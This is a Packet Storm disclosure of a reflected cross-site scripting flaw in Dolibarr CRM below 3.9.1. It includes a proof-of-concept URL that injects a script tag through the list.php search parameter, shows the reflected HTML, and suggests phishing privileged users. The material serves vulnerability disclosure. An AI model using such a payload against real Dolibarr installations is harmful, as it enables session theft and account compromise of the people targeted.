Dolibarr CRM Cross Site Scripting

2016-06-22T00:00:00
ID PACKETSTORM:137590
Type packetstorm
Reporter David Silveiro
Modified 2016-06-22T00:00:00

Description

                                        
                                            `# Exploit Title: Dolibarr CRM < 3.9.1 - Reflective XSS Vulnerability  
# Exploit Author: David Silveiro   
# Exploit Author Github: github.com/davidsilveiro  
# Exploit Author Twitter: twitter.com/david_silveiro   
# Vendor Homepage: https://www.dolibarr.org  
# Software Link: https://sourceforge.net/projects/dolibarr/files/  
# Date: Zero Day  
  
  
Dolibarr ERP is a modern CRM to manage your company.It's opensource software,   
designed for small and medium companies, foundations and freelancers.  
  
The issue lyes with insufficient sanitization when a user makes use of the search  
function provided, and thus able to inject malicious JS to be used inhand with  
a phishing attack direct towards higher previliged user.  
  
POC:  
  
http://127.0.0.1/societe/list.php?sall=<script>alert()<%2Fscript>  
  
<form name="formfilter" action="/societe/list.php" method="post">  
<input type="hidden" value="4a7a89e8a1f2f1fa55a6420ecb115954" name="token"></input>  
<input id="formfilteraction" type="hidden" value="list" name="formfilteraction"></input>  
<input type="hidden" value="s.nom" name="sortfield"></input>  
<input type="hidden" value="ASC" name="sortorder"></input>  
  
Search criteria '  
  
<strong>  
<script>  
  
alert() <-------  
  
</script>  
</strong>  
  
' into fields Third party name, Alias name, Custom…  
  
<table class="liste "></table>  
</form>  
  
  
`